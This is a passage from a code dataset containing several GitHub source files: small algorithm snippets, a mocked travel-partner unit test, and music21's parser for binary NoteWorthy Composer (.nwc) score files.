{}\".format(stack[-1]))\n\ncheck_input(user_input)","repo_name":"medeepeshyadav/Data-Structures-and-Algorithms","sub_path":"stacks/bracket_balancing.py","file_name":"bracket_balancing.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34360348283","text":"import math \ndef prime_factors(n): \n factors = []\n while n % 2 == 0: \n factors.append(2)\n n = n // 2\n for i in range(3,int(math.sqrt(n))+1,2): \n while n % i== 0: \n factors.append(i)\n n = n // i \n if n > 2: \n factors.append(n)\n return factors\n\n# Time Complexity: O(sqrt(N)), Space Complexity: O(N)\n# usage:\n# n = 100;\n# factors = prime_factors(n);\n# {2, 2, 5, 5}\n# 2*2*5*5 = 2^2 * 5^2 = 100","repo_name":"lmbaeza/Crypto","sub_path":"math/python/math_prime_factors.py","file_name":"math_prime_factors.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"464400729","text":"# -*- coding: utf-8 -*-\nimport mock\n\nfrom travel.avia.ticket_daemon.tests.partners.helper import (\n expected_variants, get_mocked_response,\n get_query, assert_variants_equal\n)\nfrom travel.avia.ticket_daemon.ticket_daemon.partners import aerotur\n\n\n@mock.patch('requests.post', return_value=get_mocked_response('uzairways3.xml'))\ndef test_aerotur_query(mocked_request):\n expected = expected_variants('uzairways3.json')\n test_query = get_query()\n variants = next(aerotur.query(test_query))\n\n assert_variants_equal(expected, variants)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/partners/test_aerotur.py","file_name":"test_aerotur.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14197418406","text":"from __future__ import annotations\n\nimport pathlib\nimport struct\nimport typing as t\nfrom typing import TypedDict\n\nfrom music21 import environment\nfrom music21 import exceptions21\n\nfrom music21.noteworthy import constants\n\nenvironLocal = environment.Environment('noteworthy.translate')\n\n\nclass FontDict(TypedDict):\n name: bytes\n size: int\n style: int\n charset: int\n\n\nclass NoteworthyBinaryTranslateException(exceptions21.Music21Exception):\n pass\n\n\nclass NWCConverter:\n '''\n A converter object for binary .nwc files. Do not normally use directly; use converter.parse.\n\n >>> nwcc = noteworthy.binaryTranslate.NWCConverter()\n >>> nwcc\n \n >>> nwcc.fileContents\n b''\n >>> nwcc.parsePosition\n 0\n >>> nwcc.version # version of nwc file to be parsed\n 200\n >>> nwcc.numberOfStaves\n 0\n >>> nwcc.staves\n []\n '''\n def __init__(self, **keywords) -> None:\n self.fileContents: bytes = b''\n self.parsePosition = 0\n self.version = 200\n self.numberOfStaves = 0\n self.titlePageInfo = 0\n self.pageNumberStart = 0\n self.staves: list[NWCStaff] = []\n self.comment: bytes = b''\n self.fonts: list[FontDict] = []\n self.lyricist: bytes = b''\n self.groupVisibility: bytes = b''\n self.allowLayering: int = 1\n self.margins: bytes = b''\n self.notationTypeface: bytes = b'Maestro'\n self.extendLastSystem = None\n self.copyright1: bytes = b''\n self.copyright2: bytes = b''\n self.increaseNoteSpacing = None\n self.author: bytes = b''\n self.title: bytes = b''\n self.measureStart = None\n self.measureNumbers = None\n self.mirrorMargins = None\n self.staffLabels = None\n self.sins = None\n self.user: bytes = b''\n self.staffHeight = 0\n self.currentAlterations: dict[int, str] = {}\n\n # noinspection SpellCheckingInspection\n def parseFile(self, fp: pathlib.Path | str):\n # noinspection PyShadowingNames\n r'''\n Parse a file (calls .toStream)\n\n >>> #_DOCS_SHOW fp = '/Users/cuthbert/desktop/cuthbert_test1.nwc'\n >>> fp = str(common.getSourceFilePath()/'noteworthy'/'cuthbert_test1.nwc') #_DOCS_HIDE\n >>> nwcc = noteworthy.binaryTranslate.NWCConverter()\n >>> nwcc.fileContents\n b''\n >>> streamObj = nwcc.parseFile(fp)\n >>> len(nwcc.fileContents) # binary\n 1139\n >>> nwcc.fileContents[0:80]\n b'[NoteWorthy ArtWare]\\x00\\x00\\x00[NoteWorthy\n Composer]\\x00\\x01\\x02\\x02\\x00\\x00\\x00N/A\\x000_JldRQMSKq6M5a3FQqK_g\\x00\\x00\\x00'\n >>> streamObj\n \n '''\n with open(fp, 'rb') as f:\n self.fileContents = f.read()\n self.parse()\n return self.toStream()\n\n def parseString(self, bytesIn: bytes = b''):\n '''\n same as parseFile but takes a string (in Py3, bytes) of binary data instead.\n '''\n self.fileContents = bytesIn\n self.parse()\n return self.toStream()\n\n def readLEShort(self, updateParsePosition=True):\n '''\n Helper module: read a little-endian short value to an integer\n\n >>> nwcc = noteworthy.binaryTranslate.NWCConverter()\n >>> nwcc.fileContents = b'\\x02\\x01\\x03\\x01'\n >>> nwcc.parsePosition\n 0\n >>> nwcc.readLEShort()\n 258\n >>> nwcc.parsePosition\n 2\n >>> nwcc.readLEShort()\n 259\n >>> nwcc.parsePosition\n 4\n\n Or to not update the parsePosition, send False:\n >>> nwcc.parsePosition = 0\n >>> nwcc.readLEShort(False)\n 258\n >>> nwcc.readLEShort(False)\n 258\n >>> nwcc.parsePosition\n 0\n '''\n fc = self.fileContents\n pp = self.parsePosition\n value = struct.unpack(' 127 then it's subtracted from 256)\n '''\n fc = self.fileContents\n pp = self.parsePosition\n value = ord(fc[pp:pp + 1])\n # print(value)\n if updateParsePosition is True:\n self.parsePosition = pp + 1\n return value\n\n def byteToSignedInt(self, updateParsePosition=True):\n '''\n changes a byte into a signed int\n (i.e., if the byte is > 127 then it's subtracted from 256)\n '''\n val = self.byteToInt(updateParsePosition)\n if val > 127:\n val = val - 256\n return val\n\n def readBytes(self, bytesToRead=1, updateParsePosition=True) -> bytes:\n '''\n reads the next bytesToRead bytes and then (optionally) updates self.parsePosition\n '''\n fc = self.fileContents\n pp = self.parsePosition\n value = fc[pp:pp + bytesToRead]\n if updateParsePosition is True:\n self.parsePosition = pp + bytesToRead\n return value\n\n def readToNUL(self, updateParsePosition=True) -> bytes:\n r'''\n reads self.fileContents up to, but not including, the next position of \\x00.\n\n updates the parsePosition unless updateParsePosition is False\n '''\n fc = self.fileContents\n try:\n nulPosition = fc.index(0, self.parsePosition)\n except ValueError:\n nulPosition = -1\n # raise NoteworthyBinaryTranslateException(fc[self.parsePosition:],\n # self.parsePosition)\n # print(self.parsePosition, nulPosition)\n ret: bytes\n if nulPosition == -1:\n ret = fc[self.parsePosition:]\n else:\n ret = fc[self.parsePosition:nulPosition]\n if updateParsePosition is True:\n self.parsePosition = nulPosition + 1\n return ret\n\n def isValidNWCFile(self, updateParsePosition=True) -> bool:\n storedPP = self.parsePosition\n self.parsePosition = 0\n header1 = self.readToNUL()\n if header1 != b'[NoteWorthy ArtWare]':\n return False\n junk = self.readToNUL()\n junk = self.readToNUL()\n header2 = self.readToNUL()\n if header2 != '[NoteWorthy Composer]':\n return False\n if updateParsePosition is False and storedPP != 0:\n self.parsePosition = storedPP\n return True\n\n # thanks to Juria90 for figuring these out! and so much more!\n versionFromHex = {0x0114: 120,\n 0x011E: 130,\n 0x0132: 150,\n 0x0137: 155,\n 0x0146: 170,\n 0x014B: 175,\n 0x0200: 200,\n 0x0201: 201,\n }\n\n def fileVersion(self, updateParsePosition=True):\n storedPP = self.parsePosition\n self.parsePosition = 45\n fileVersionRaw = self.readLEShort(updateParsePosition)\n if updateParsePosition is False:\n self.parsePosition = storedPP\n if fileVersionRaw in self.versionFromHex:\n self.version = self.versionFromHex[fileVersionRaw]\n else:\n print('No Version Found! Most likely a newer version. Using 2.01')\n self.version = 201 # most likely a newer version\n\n return self.version\n\n def skipBytes(self, numBytes=1):\n self.parsePosition += numBytes\n\n def advanceToNotNUL(self, nul: bytes = b'\\x00'):\n pp = self.parsePosition\n fc = self.fileContents\n # the slice Notation [pp:pp + 1] is needed to avoid Py3 conversion to bytes\n while fc[pp:pp + 1] == nul:\n pp += 1\n self.parsePosition = pp\n\n def parse(self):\n '''\n the main parse routine called by parseFile() or parseString()\n '''\n if self.fileContents[0:6] == b'[NWZ]\\x00':\n import zlib\n fcNew = zlib.decompress(self.fileContents[6:])\n self.fileContents = fcNew\n\n self.parsePosition = 0\n self.parseHeader()\n self.staves = []\n # print(self.numberOfStaves)\n\n for i in range(self.numberOfStaves):\n thisStaff = NWCStaff(parent=self)\n thisStaff.parse()\n self.staves.append(thisStaff)\n\n def parseHeader(self) -> None:\n '''\n Sets a ton of information from the header, and advances the parse position.\n '''\n self.isValidNWCFile()\n self.fileVersion()\n\n # print(self.version)\n # print(self.parsePosition)\n self.skipBytes(4) # skipping registered vs. unregistered\n # print(self.parsePosition)\n self.user = self.readToNUL()\n # print(self.user)\n unused_unknown = self.readToNUL()\n # print(unused_unknown)\n self.skipBytes(10)\n self.title = self.readToNUL()\n self.author = self.readToNUL()\n if self.version >= 200:\n self.lyricist = self.readToNUL()\n self.copyright1 = self.readToNUL()\n self.copyright2 = self.readToNUL()\n self.comment = self.readToNUL()\n\n self.extendLastSystem = self.byteToInt()\n self.increaseNoteSpacing = self.byteToInt()\n unused = self.readBytes(5)\n self.measureNumbers = self.byteToInt()\n\n unused = self.readBytes(1)\n self.measureStart = self.readLEShort()\n if self.version >= 130:\n self.margins = self.readToNUL()\n else:\n self.margins = b'0.0 0.0 0.0 0.0'\n\n unused = self.byteToInt()\n unused = self.readBytes(2)\n if self.version >= 130:\n self.groupVisibility = self.readBytes(32)\n self.allowLayering = self.byteToInt()\n\n if self.version >= 200:\n self.notationTypeface = self.readToNUL()\n self.staffHeight = self.readLEShort()\n\n if self.version > 170:\n fontCount = 12\n elif self.version > 130:\n fontCount = 10 # some 170 have 12 font info. See Juria90's code for workaround.\n else:\n fontCount = 0\n self.advanceToNotNUL() # should not be needed, but some parse errors\n self.skipBytes(2)\n self.fonts = []\n for i in range(fontCount):\n fontDict: FontDict = {\n 'name': self.readToNUL(),\n 'style': self.byteToInt(), # regular; 1 = bold; 2 = italic; 3 = bold italic???\n 'size': self.byteToInt(),\n 'charset': 0,\n }\n unused = self.byteToInt()\n fontDict['charset'] = self.byteToInt()\n if fontDict['name'] == b'':\n fontDict['name'] = b'Times New Roman'\n if fontDict['size'] == 0:\n fontDict['size'] = 12\n self.fonts.append(fontDict)\n # ansi charset is default; but we don't use\n # print(self.fonts)\n self.titlePageInfo = self.byteToInt()\n\n # index of [None, First Systems, Top Systems, All Systems]\n self.staffLabels = self.byteToInt()\n self.pageNumberStart = self.readLEShort()\n if self.version >= 200:\n self.skipBytes(1)\n self.numberOfStaves = self.byteToInt()\n # print('StaffCount', self.numberOfStaves)\n self.skipBytes(1)\n\n def dumpToNWCText(self) -> list[str]:\n infos = ''\n if self.title:\n infos += '|SongInfo|Title:' + self.title.decode('latin_1')\n if self.author:\n infos += '|Author:' + self.author.decode('latin_1')\n dumpObjects = [infos]\n for s in self.staves:\n staffDumpObjects = s.dump()\n for sdo in staffDumpObjects:\n dumpObjects.append(sdo)\n\n return dumpObjects\n\n def toStream(self):\n from music21.noteworthy import translate\n nwt = translate.NoteworthyTranslator()\n s = nwt.parseList(self.dumpToNWCText())\n return s\n\n\nclass NWCStaff:\n '''\n A NWCStaff is a list of NWCObjects (see :meth:`parseObjects`) associated to metadata\n (see :meth:`parseHeader`). It may also contain some lyrics (see :meth:`parseLyrics`).\n It defines a :meth:`dump` method that return a list of string containing the\n nwctxt-formatted content of each object of the staff.\n '''\n def __init__(self, parent: NWCConverter) -> None:\n self.parent: NWCConverter = parent\n self.lyrics: list[list[bytes]] = []\n self.objects: list[NWCObject] = []\n self.instrumentName: bytes = b''\n self.group = None\n self.layerWithNextStaff = None\n self.transposition = None\n self.partVolume = None\n self.stereoPan = None\n self.color = 0\n self.alignSyllable = None\n self.numberOfLyrics = 0\n self.numberOfObjects = 0\n self.lines = 0\n self.name = None\n self.staffOffset = 0\n self.label: bytes = b''\n self.lyricAlignment = 0\n\n def parse(self):\n # environLocal.warn([self.parent.parsePosition, self.objects])\n self.parseHeader()\n # environLocal.warn(['header done', self.parent.parsePosition, self.objects])\n self.parseLyrics()\n # environLocal.warn(['lyrics done', self.parent.parsePosition, self.objects])\n self.parseObjects()\n # environLocal.warn([self.parent.parsePosition, self.objects])\n\n def dump(self) -> list[str]:\n dumpObjects = []\n\n # default to first midi instrument\n instruName = (self.instrumentName.decode('latin_1')\n if self.instrumentName\n else 'Acoustic Grand Piano')\n label = self.label.decode('latin_1') if self.label else instruName\n\n staffString = '|AddStaff|Name:' + label\n dumpObjects.append(staffString)\n\n staffInstruString = '|StaffInstrument|Name:' + instruName\n if instruName in constants.MidiInstruments:\n staffInstruString += '|Patch:'\n staffInstruString += str(constants.MidiInstruments.index(instruName))\n\n staffInstruString += '|Trans:' + str(self.transposition)\n\n dumpObjects.append(staffInstruString)\n\n for o in self.objects:\n dm = o.dumpMethod\n d = dm(o)\n if d != '':\n dumpObjects.append(d)\n\n return dumpObjects\n\n def parseHeader(self):\n p = self.parent\n # p = NWCConverter()\n self.name = p.readToNUL()\n # print('staff name:', self.name)\n if p.version >= 200:\n self.label = p.readToNUL()\n # print('label:', self.label)\n self.instrumentName = p.readToNUL()\n # print('instrument name:', self.instrumentName)\n self.group = p.readToNUL()\n # print('group: ', self.group)\n\n if p.version >= 200:\n # self.endingBar = p.byteToInt()\n # self.muted = p.byteToInt()\n # junk = p.byteToInt()\n # self.channel = p.byteToInt()\n # junk = p.byteToInt()\n # self.playbackDevice = p.byteToInt()\n # junk = p.byteToInt()\n # self.patchBank = p.byteToInt()\n # junk = p.byteToInt()\n # self.patchName = p.byteToInt()\n # junk = p.byteToInt()\n # self.defaultVelocity = p.byteToInt()\n # self.style = p.readLEShort()\n # self.verticalSizeUpper = p.readLEShort()\n # self.verticalSizeLower = p.readLEShort()\n\n p.skipBytes(27)\n self.lines = p.byteToInt()\n # print('lines:', self.lines)\n # print('position:', p.parsePosition)\n self.layerWithNextStaff = p.readLEShort()\n self.transposition = p.readLEShort()\n self.partVolume = p.readLEShort()\n self.stereoPan = p.readLEShort()\n self.color = p.byteToInt()\n self.alignSyllable = p.readLEShort()\n self.numberOfLyrics = p.readLEShort()\n\n elif p.version == 175:\n p.skipBytes(11)\n instruPatch = p.byteToInt()\n index = instruPatch - 1 if 0 < instruPatch < len(constants.MidiInstruments) else 0\n self.instrumentName = constants.MidiInstruments[index].encode('latin_1')\n p.skipBytes(10)\n self.transposition = p.byteToSignedInt()\n p.skipBytes(6)\n self.alignSyllable = p.readLEShort()\n self.numberOfLyrics = p.readLEShort()\n\n if self.numberOfLyrics > 0:\n self.lyricAlignment = p.readLEShort()\n self.staffOffset = p.readLEShort()\n else:\n self.lyricAlignment = 0\n self.staffOffset = 0\n # print('Number of lyrics:', self.numberOfLyrics)\n\n def parseLyrics(self):\n\n p = self.parent\n lyrics = []\n\n for i in range(self.numberOfLyrics):\n syllables = []\n try:\n lyricBlockSize = p.readLEShort()\n except struct.error:\n lyricBlockSize = 0\n environLocal.warn('Could not read lyrics. Trying with zero length.')\n # print('lyric block size: ', lyricBlockSize)\n\n if lyricBlockSize > 0:\n unused_lyricSize = p.readLEShort()\n parsePositionStart = p.parsePosition\n\n # print('lyric Size: ', lyricSize)\n junk = p.readLEShort()\n continueIt = True\n maxRead = 1000\n while continueIt is True and maxRead > 0:\n syllable = p.readToNUL()\n # environLocal.warn([p.parsePosition, syllable, 'syllable'])\n maxRead -= 1\n # print('syllable: ', syllable)\n if syllable == b'':\n continueIt = False\n else:\n syllables.append(syllable)\n p.parsePosition = parsePositionStart + lyricBlockSize\n lyrics.append(syllables)\n # print(syllables)\n # print(lyrics)\n if self.numberOfLyrics > 0:\n junk = p.readLEShort()\n junk_2 = p.readLEShort()\n # print(p.parsePosition)\n self.lyrics = lyrics\n return lyrics\n\n def parseObjects(self):\n p = self.parent\n objects = []\n self.numberOfObjects = p.readLEShort()\n if p.version > 150:\n self.numberOfObjects -= 2\n\n # print('Number of objects: ', self.numberOfObjects)\n for i in range(self.numberOfObjects):\n thisObject = NWCObject(staffParent=self, parserParent=p)\n thisObject.parse()\n objects.append(thisObject)\n self.objects = objects\n # print(objects)\n return objects\n\n\nclass NWCObject:\n '''\n NWCObject class is a union that can be used for each type of object contained in a staff.\n\n An object binary blob starts with its type.\n The parse() method calls the appropriate method depending on the object type.\n Each parsing method should set up the 'dumpMethod' method that return the nwctxt version\n of the object.\n '''\n def __init__(self, staffParent: NWCStaff, parserParent: NWCConverter):\n self.staffParent: NWCStaff = staffParent\n self.parserParent: NWCConverter = parserParent\n self.type = None\n self.placement = 0\n self.pos = 0\n self.style = 0\n self.localRepeatCount = 0\n self.data = 0\n self.data1 = None\n self.data2 = None\n self.data3 = None\n self.delay = 0\n self.clefType = 0\n self.offset = 0\n self.visible = 0\n self.duration = 0\n self.durationStr = None\n self.font = 0\n self.sharps = 0\n self.octaveShift = 0\n self.octaveShiftName = None\n self.clefName = None\n self.attribute1 = None\n self.attribute2 = 0\n self.stemLength = 0\n self.dots = 0\n self.bits = 0\n self.denominator = 0\n self.tieInfo = ''\n self.volume = 0\n self.base = 0\n self.velocity = 0\n self.count = 0\n self.name = None\n self.value = 0\n self.flats = 0\n self.keyString = ''\n self.numerator = 0\n self.alterationStr = ''\n self.dotAttribute = None\n self.text = None\n\n def genericDumpMethod(inner_self) -> str:\n return ''\n\n self.dumpMethod = genericDumpMethod\n\n def parse(self):\n '''\n determine what type of object I am, and set things accordingly\n '''\n p = self.parserParent\n objectType = p.readLEShort() # a number -- an index in the objMethods list\n if objectType >= len(self.objMethods) or objectType < 0:\n raise NoteworthyBinaryTranslateException(\n f'Cannot translate objectType: {objectType}; max is {len(self.objMethods)}')\n if p.version >= 170:\n self.visible = p.byteToInt()\n else:\n self.visible = 0\n\n objectMethod = self.objMethods[objectType]\n\n objectMethod(self)\n\n # Start parsing specific objects\n # =================================\n\n def clef(self):\n '''\n clef info,\n 4 bytes\n '''\n p = self.parserParent\n # print('Clef at: ', p.parsePosition)\n self.type = 'Clef'\n self.clefType = p.readLEShort()\n self.octaveShift = p.readLEShort()\n\n if self.clefType < len(constants.ClefNames):\n self.clefName = constants.ClefNames[self.clefType]\n if self.octaveShift < len(constants.OctaveShiftNames):\n self.octaveShiftName = constants.OctaveShiftNames[self.octaveShift]\n\n # print('now at: ', p.parsePosition)\n def dump(inner_self):\n build = '|Clef|'\n if inner_self.clefName:\n build += 'Type:' + inner_self.clefName + '|'\n if inner_self.octaveShiftName:\n build += 'OctaveShift:' + inner_self.octaveShiftName + '|'\n return build\n\n self.dumpMethod = dump\n\n def keySig(self):\n '''\n Key signature\n 10 bytes\n '''\n p = self.parserParent\n self.type = 'KeySig'\n self.flats = p.byteToInt()\n p.skipBytes(1) # ?\n self.sharps = p.byteToInt()\n p.skipBytes(7)\n\n # too complex...\n # for letter in ['A', 'B', 'C', 'D', 'E', 'F', 'G']:\n # bitshift = ord(letter) - ord('A')\n # letterMask = 1 << bitshift\n\n if self.flats > 0 and self.flats in constants.FlatMask:\n self.keyString = constants.FlatMask[self.flats]\n elif self.sharps > 0 and self.sharps in constants.SharpMask:\n self.keyString = constants.SharpMask[self.sharps]\n else:\n self.keyString = '' # no unusual key signatures\n\n def dump(inner_self):\n build = '|Key|Signature:' + inner_self.keyString\n return build\n\n self.dumpMethod = dump\n\n def barline(self):\n '''\n Bar line\n 2 bytes\n '''\n p = self.parserParent\n self.type = 'Barline'\n self.style = p.byteToInt()\n self.localRepeatCount = p.byteToInt()\n\n self.parserParent.currentAlterations = {}\n\n def dump(inner_self):\n build = '|Bar|'\n # we don't care about 'Single', as it is the default\n if 0 < inner_self.style < len(constants.BarStyles):\n styleString = constants.BarStyles[inner_self.style]\n build += '|Style:' + styleString\n return build\n\n self.dumpMethod = dump\n\n def ending(self):\n '''\n Endings\n 2 bytes\n '''\n p = self.parserParent\n self.type = 'Ending'\n self.style = p.byteToInt()\n p.skipBytes(1)\n\n def dump(inner_self):\n return '|Ending|Endings:' + str(inner_self.style)\n\n self.dumpMethod = dump\n\n def instrument(self):\n '''\n Instrument\n 8 bytes\n '''\n p = self.parserParent\n self.type = 'Instrument'\n # self.name = p.readToNUL()\n # p.skipBytes(1)\n p.skipBytes(8) # velocity\n\n def timeSig(self):\n '''\n Time signature\n 6 bytes\n '''\n p = self.parserParent\n self.type = 'TimeSig'\n self.numerator = p.readLEShort()\n self.bits = p.readLEShort()\n self.denominator = 1 << self.bits\n self.style = p.readLEShort()\n\n def dump(inner_self):\n build = f'|TimeSig|Signature:{inner_self.numerator}/{inner_self.denominator}'\n return build\n\n self.dumpMethod = dump\n\n def tempo(self):\n '''\n Tempo indications\n 5 bytes + null terminated string\n '''\n p = self.parserParent\n self.type = 'Tempo'\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.value = p.readLEShort()\n self.base = p.byteToInt()\n if p.version < 170:\n junk = p.readLEShort()\n self.text = p.readToNUL()\n\n def dump(inner_self):\n return f'|Tempo|Tempo:{inner_self.value}'\n\n self.dumpMethod = dump\n\n\n def dynamic(self):\n '''\n dynamics\n 7 bytes\n '''\n p = self.parserParent\n self.type = 'Dynamic'\n if p.version < 170:\n print('Dynamics on version below 1.70 is not supported yet')\n else:\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.style = p.byteToInt()\n self.velocity = p.readLEShort()\n self.volume = p.readLEShort()\n\n def setDurationForObject(self):\n '''\n get duration string for note or rest\n '''\n\n durStr = constants.DurationValues[self.duration]\n\n grace = 0\n triplet = False\n if self.type == 'Note':\n self.dotAttribute = self.attribute1[0]\n grace = self.attribute1[1] & 0x20\n else:\n self.dotAttribute = self.data2[3]\n\n # start 0101, middle 1010, end 1111\n triplet = self.data2[1] & 0x0c\n\n ordDot = self.dotAttribute\n\n if (ordDot & 0x01) > 0:\n self.dots = 2\n elif (ordDot & 0x04) > 0:\n self.dots = 1\n else:\n self.dots = 0\n\n if self.dots == 1:\n durStr += ',Dotted'\n elif self.dots == 2:\n durStr += ',DblDotted'\n\n if grace > 0:\n durStr += ',Grace'\n\n if triplet:\n durStr += ',Triplet'\n\n return durStr\n\n def note(self):\n '''\n Note\n 8 bytes\n '''\n p = self.parserParent\n self.type = 'Note'\n # print('Note at parse position: ', p.parsePosition)\n if p.version < 170:\n print('Cannot yet handle versions before 170')\n else:\n self.duration = p.byteToInt()\n self.data2 = p.readBytes(3) # ??\n self.attribute1 = p.readBytes(2)\n # print(hex(ord(self.attribute1[0])))\n self.pos = p.byteToSignedInt()\n self.pos = -1 * self.pos\n self.attribute2 = p.byteToInt()\n if p.version <= 170:\n self.data3 = p.readBytes(2)\n else:\n self.data3 = None\n if p.version >= 200:\n if (self.attribute2 & 0x40) != 0:\n # print('have stemLength info!')\n self.stemLength = p.byteToInt()\n else:\n # print('attribute 2:', hex(self.attribute2))\n self.stemLength = 7\n else:\n self.stemLength = 7\n # if p.version >= 200 and (self.attribute2 & 0x40) != 0:\n # self.stemLength = p.byteToInt()\n # else:\n # self.stemLength = 7\n # uh oh!!!\n # p.skipBytes(2)\n # print('Now at: ', p.parsePosition)\n # print('Duration: ', self.duration)\n # print('Data2: ',)\n # for i in self.data2:\n # print(hex(ord(i)),)\n # print('...')\n\n self.durationStr = self.setDurationForObject()\n\n alterationIndex = self.attribute2 & 0x07\n if alterationIndex < len(constants.AlterationTexts):\n self.alterationStr = constants.AlterationTexts[alterationIndex]\n else:\n self.alterationStr = ''\n\n\n # in NWC, alteration is not specified for other octave\n if self.alterationStr == '':\n self.alterationStr = self.parserParent.currentAlterations.get(self.pos % 7, '')\n if self.alterationStr is None:\n self.alterationStr = ''\n self.parserParent.currentAlterations[self.pos % 7] = self.alterationStr\n\n self.tieInfo = ''\n ordAtt1 = self.attribute1[0]\n if (ordAtt1 & 0x10) > 0:\n self.tieInfo = '^'\n\n def dump(inner_self):\n build = '|Note|Dur:' + inner_self.durationStr + '|'\n\n build += ('Pos:'\n + inner_self.alterationStr\n + str(inner_self.pos)\n + inner_self.tieInfo + '|')\n return build\n\n self.dumpMethod = dump\n\n def rest(self):\n '''\n Rest\n 8 bytes\n '''\n p = self.parserParent\n self.type = 'Rest'\n if p.version <= 150:\n print('igg...')\n else:\n self.duration = p.byteToInt()\n self.data2 = p.readBytes(5)\n self.offset = p.readLEShort()\n\n self.durationStr = self.setDurationForObject()\n\n def dump(inner_self):\n build = '|Rest|Dur:' + inner_self.durationStr + '|'\n return build\n\n self.dumpMethod = dump\n\n def noteChordMember(self):\n '''\n Chord member\n 8 bytes + n Note objects\n '''\n p = self.parserParent\n self.type = 'NoteChordMember'\n numberOfNotes = 0\n if p.version <= 170:\n self.data1 = p.readBytes(12)\n elif p.version == 175:\n self.data1 = p.readBytes(10)\n numberOfNotes = self.data1[8]\n else:\n self.data1 = p.readBytes(8)\n if p.version >= 200:\n if (self.data1[7] & 0x40) != 0:\n print('have stemLength info!')\n self.stemLength = p.byteToInt()\n else:\n # print('attribute 2:', hex(self.attribute2))\n self.stemLength = 7\n else:\n self.stemLength = 7\n\n self.data2 = []\n if t.TYPE_CHECKING:\n assert isinstance(self, NWCStaff)\n for i in range(numberOfNotes):\n chordNote = NWCObject(staffParent=self, parserParent=p)\n chordNote.parse()\n self.data2.append(chordNote)\n\n def dump(inner_self):\n build = '|Chord'\n notes = {}\n for d in inner_self.data2:\n if notes.get(d.durationStr) is None:\n notes[d.durationStr] = []\n\n notes[d.durationStr].append(d.alterationStr + str(d.pos) + d.tieInfo)\n\n for n in notes:\n build += '|Dur:' + n + '|Pos:' + ','.join(notes[n])\n\n return build\n\n self.dumpMethod = dump\n\n\n\n def pedal(self):\n '''\n Pedal\n 3 bytes\n '''\n p = self.parserParent\n self.type = 'Pedal'\n if p.version < 170:\n print('Pedal on version below 170 is not yet supported')\n else:\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.style = p.byteToInt()\n\n def flowDir(self):\n '''\n Flow\n 4 bytes\n '''\n p = self.parserParent\n self.type = 'FlowDir'\n if p.version >= 170:\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n else:\n self.pos = -8 # so needs to be signed int?\n self.placement = 0x01\n\n self.style = p.readLEShort()\n\n def mpc(self):\n '''\n Midi Instructions\n 34 bytes\n '''\n p = self.parserParent\n self.type = 'MPC'\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n if p.version == 175:\n self.data1 = p.readBytes(32)\n elif p.version > 155:\n self.data1 = p.readBytes(31)\n else:\n self.data1 = p.readBytes(32)\n\n def tempoVariation(self):\n '''\n Tempo variation\n 4 bytes\n '''\n p = self.parserParent\n self.type = 'TempoVariation'\n if p.version >= 170:\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.style = p.byteToInt()\n self.delay = p.byteToInt()\n else:\n self.style = p.byteToInt()\n self.style = self.style & 0x0F\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.delay = p.byteToInt()\n\n def dynamicVariation(self):\n '''\n Dynamic variation\n 3 bytes\n '''\n p = self.parserParent\n self.type = 'DynamicVariation'\n self.pos = p.byteToInt()\n if p.version >= 170:\n self.placement = p.byteToInt()\n else:\n self.placement = 0\n self.style = p.byteToInt()\n\n def performance(self):\n '''\n Performance\n 3 bytes\n '''\n p = self.parserParent\n self.type = 'Performance'\n self.pos = p.byteToInt()\n if p.version >= 170:\n self.placement = p.byteToInt()\n else:\n self.placement = 0\n self.style = p.byteToInt()\n\n def textObj(self):\n '''\n Text\n 3 bytes + null terminated string\n '''\n p = self.parserParent\n self.type = 'Text'\n self.pos = p.byteToSignedInt()\n self.data = p.byteToInt()\n # role of the text (lyric, staff info ...)\n self.font = p.byteToInt()\n self.text = p.readToNUL()\n\n def dump(inner_self):\n build = '|Text|Text:' + inner_self.text.decode('latin_1') + '|Pos:' + str(self.pos)\n return build\n\n if self.text is not None:\n self.dumpMethod = dump\n\n\n def restChordMember(self):\n '''\n Rest chord\n 10 bytes\n '''\n self.noteChordMember()\n self.type = 'RestChordMember'\n if t.TYPE_CHECKING:\n assert isinstance(self, NWCStaff)\n rest = NWCObject(staffParent=self, parserParent=self.parserParent)\n rest.duration = self.data1[0]\n rest.data2 = self.data1\n rest.durationStr = rest.setDurationForObject()\n self.data2.append(rest)\n\n def dump(inner_self):\n build = '|Chord'\n notes = {}\n for d in inner_self.data2:\n if notes.get(d.durationStr) is None:\n notes[d.durationStr] = []\n\n notes[d.durationStr].append(d.alterationStr + str(d.pos) + d.tieInfo)\n\n i = 0\n for n in notes:\n if i == len(notes) - 1:\n build += '|Dur2:' + n + '|Pos2:' + ','.join(notes[n])\n else:\n build += '|Dur:' + n + '|Pos:' + ','.join(notes[n])\n i += 1\n\n return build\n\n self.dumpMethod = dump\n\n # list of methods to parse specific object. The index in the list\n # is the ID of the object to parse.\n # see NWCObject.parse\n objMethods = [clef, # 0\n keySig, # 1\n barline, # 2\n ending, # 3\n instrument, # 4\n timeSig, # 5\n tempo, # 6\n dynamic, # 7\n note, # 8\n rest, # 9\n noteChordMember, # 10\n pedal, # 11\n flowDir, # 12\n mpc, # 13\n tempoVariation, # 14\n dynamicVariation, # 15\n performance, # 16\n textObj, # 17\n restChordMember # 18\n ]\n\n\nif __name__ == '__main__':\n import music21\n music21.mainTest()\n # fp = '/Users/cuthbert/Desktop/395.nwc'\n # fp = 'http://www.cpdl.org/brianrussell/358.nwc'\n # from music21 import converter\n # s = converter.parse(fp)\n # s.show()\n\n # nwc = NWCConverter()\n # s = nwc.parseFile(fp)\n # s.show()\n # print(nwc.dumpToNWCText())\n # print(nwc.isValidNWCFile())\n # 